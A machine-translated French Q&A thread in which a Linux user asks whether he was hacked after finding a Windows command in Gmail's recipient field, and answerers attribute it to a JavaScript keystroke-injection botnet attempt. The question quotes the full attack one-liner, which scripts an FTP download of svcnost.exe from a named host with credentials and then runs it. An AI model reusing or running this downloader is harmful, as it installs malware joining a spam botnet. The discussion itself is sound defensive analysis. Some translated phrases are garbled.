web-dev-qa-db-fra.com

Comment identifier si mon ordinateur Linux a été piraté?

Mon ordinateur personnel est généralement allumé, mais le moniteur est éteint. Ce soir, je suis rentré du travail à la maison et j'ai trouvé ce qui ressemblait à une tentative de piratage: dans mon navigateur, mon compte Gmail était ouvert (c'était moi), mais il était en mode composition avec les éléments suivants dans le champ TO:

md/c echo open cCTeamFtp.yi.org 21 >> ik & echo utilisateur ccteam10 765824 >> ik & echo binary >> ik & echo get svcnost.exe >> ik & echo bye >> ik & ftp -n -v -s: ik & del ik & svcnost.exe & exit echo Vous avez été propriétaire

Pour moi, cela ressemble au code de ligne de commande Windows, et le début du code md, combiné au fait que Gmail était en mode de composition, indique à l'évidence que quelqu'un a essayé d'exécuter une commande cmd. Je suppose que j'ai eu de la chance de ne pas utiliser Windows sur ce PC, mais j'en ai d'autres. C'est la première fois que quelque chose comme ça m'est arrivé. Je ne suis pas un gourou de Linux et je n'exécutais aucun programme autre que Firefox à l'époque.

Je suis absolument sûr de ne pas avoir écrit cela, et personne d'autre n'était physiquement à mon ordinateur. De plus, j'ai récemment changé mon mot de passe Google (et tous mes autres mots de passe) en quelque chose comme vMA8ogd7bv. Je ne pense donc pas que quelqu'un ait piraté mon compte Google.

Qu'est-ce qui vient de se passer? Comment peut-on appuyer sur mon ordinateur alors que ce n'est pas la vieille machine Windows de grand-mère qui exécute des logiciels malveillants depuis des années, mais une récente installation Ubuntu?

Mise à jour:
Permettez-moi d'aborder certains points et questions:

  • Je suis en Autriche, à la campagne. Mon routeur WLAN fonctionne WPA2 / PSK et une puissance moyenne mot de passe qui n'est pas dans le dictionnaire; devrait être brute-force et moins de 50 mètres d'ici; il est peu probable qu'il ait été piraté.
  • J'utilise un clavier filaire USB, donc encore une fois très peu probable que quelqu'un puisse être à portée de main pour le pirater.
  • Je n'utilisais pas mon ordinateur à l'époque; c'était juste au ralenti à la maison pendant que j'étais au travail. C'est un PC nettop monté sur un moniteur, donc je l'éteins rarement.
  • La machine n’a que deux mois, ne tourne que sous Ubuntu, et je n’utilise pas de logiciels étranges, ni de sites étranges. C'est principalement Stack Exchange, Gmail et les journaux. Pas de jeux. Ubuntu est prêt à se tenir à jour.
  • Je ne suis au courant d'aucun service VNC en cours d'exécution; Je n'ai certainement pas installé ou activé un. Je n'ai pas non plus démarré d'autres serveurs. Je ne suis pas sûr si certains fonctionnent sous Ubuntu par défaut?
  • Je connais toutes les adresses IP dans l'activité du compte Gmail. Je suis à peu près sûr que Google n'était pas une porte d'entrée.
  • J'ai trouvé une visionneuse de fichiers journaux , mais je ne sais pas quoi chercher. Aidez-moi?

Ce que je veux vraiment savoir, c’est ce qui me rend mal à l’aise, c’est: comment un utilisateur d’Internet peut-il générer des frappes au clavier sur ma machine? Je ne suis pas un geek sur Linux, je suis un père qui bousille Windows depuis plus de 20 ans et j'en ai marre. Et depuis plus de 18 ans que je suis en ligne, je n’ai personnellement jamais assisté à une tentative de piratage informatique, c’est donc nouveau pour moi.

linuxsecurity
128
Torben Gundtofte-Bruun

Je doute que tu aies à t'inquiéter. Il s'agissait probablement d'une attaque JavaScript qui tentait d'effectuer un téléchargement par téléchargement . Si cela vous inquiète, commencez à utiliser NoScript et AdBlock Plus Firefox Ajouts.

Même en visitant des sites de confiance, vous n'êtes pas en sécurité car ils utilisent du code JavaScript provenant d'annonceurs tiers, qui peut être malveillant.

Je l'ai attrapé et l'ai exécuté dans une machine virtuelle. Il a installé mirc et ceci est le journal d'état ... http://Pastebin.com/Mn85akMk

Il s’agit d’une attaque automatisée qui essaie de vous demander de télécharger mIRC et de rejoindre un botnet qui vous transformera en spambot ... Elle avait mon VM rejoint et établi une connexion à un certain nombre d’adresses distantes dont autoemail-119.west320.com.

Pour l'exécuter sous Windows 7, je devais accepter l'invite UAC et lui permettre d'accéder à travers le pare-feu.

Il semble y avoir des tonnes de rapports de cette commande exacte sur d'autres forums, et quelqu'un dit même qu'un fichier torrent a essayé de l'exécuter une fois le téléchargement terminé ... Je ne sais pas comment cela serait possible.

Je ne l'ai pas utilisé moi-même, mais il devrait pouvoir vous montrer les connexions réseau actuelles afin que vous puissiez voir si vous êtes connecté à quelque chose qui sort de la norme: http: // netactview. sourceforge.net/download.html

66
Riguez

Je suis d'accord avec @ jb48394 que c'est probablement un exploit JavaScript, comme tout le reste aujourd'hui.

Le fait qu'il ait essayé d'ouvrir une fenêtre cmd (voir le commentaire de @ torbengb ) et d'exécuter une commande malveillante, plutôt que de simplement télécharger le cheval de Troie de manière discrète en arrière-plan, suggère qu'il exploite une vulnérabilité de Firefox qui lui permet d'entrer des frappes de touche, mais pas de code d'exécution.

Ceci explique également pourquoi cet exploit, qui était clairement écrit exclusivement pour Windows, fonctionnerait également sous Linux: Firefox exécute JavaScript de la même manière dans tous les systèmes d'exploitation (au moins, il essaie de :)) . Si cela était dû à un dépassement de tampon ou à un exploit similaire destiné à Windows, le programme aurait été bloqué.

En ce qui concerne l'origine du code JavaScript, il s'agit probablement d'une annonce Google malveillante (les annonces circulent dans Gmail toute la journée) . Ce ne serait passoitleen premierheure .

41
BlueRaja - Danny Pflughoeft

J'ai trouvé une attaque similaire sur une autre machine Linux. Il semble que ce soit une sorte de commande FTP pour Windows.

12
Shekhar

Cela ne répond pas à l'ensemble de votre question, mais dans le fichier journal, recherchez les tentatives de connexion infructueuses.

S'il y a plus de cinq tentatives infructueuses dans votre journal, quelqu'un essaie de craquer root. Si vous essayez de vous connecter à root avec succès alors que vous étiez loin de votre ordinateur, CHANGEZ VOTRE MOT DE PASSE IMMÉDIATEMENT !! Je veux dire maintenant! De préférence à quelque chose alphanumérique, et environ 10 caractères de long.

Avec les messages que vous avez reçus (les commandes echo), cela ressemble vraiment à un script immobile kiddie . Si c’était un véritable pirate informatique qui savait ce qu’il faisait, vous ne le sauriez probablement pas encore.

5
Nate Koppenhaver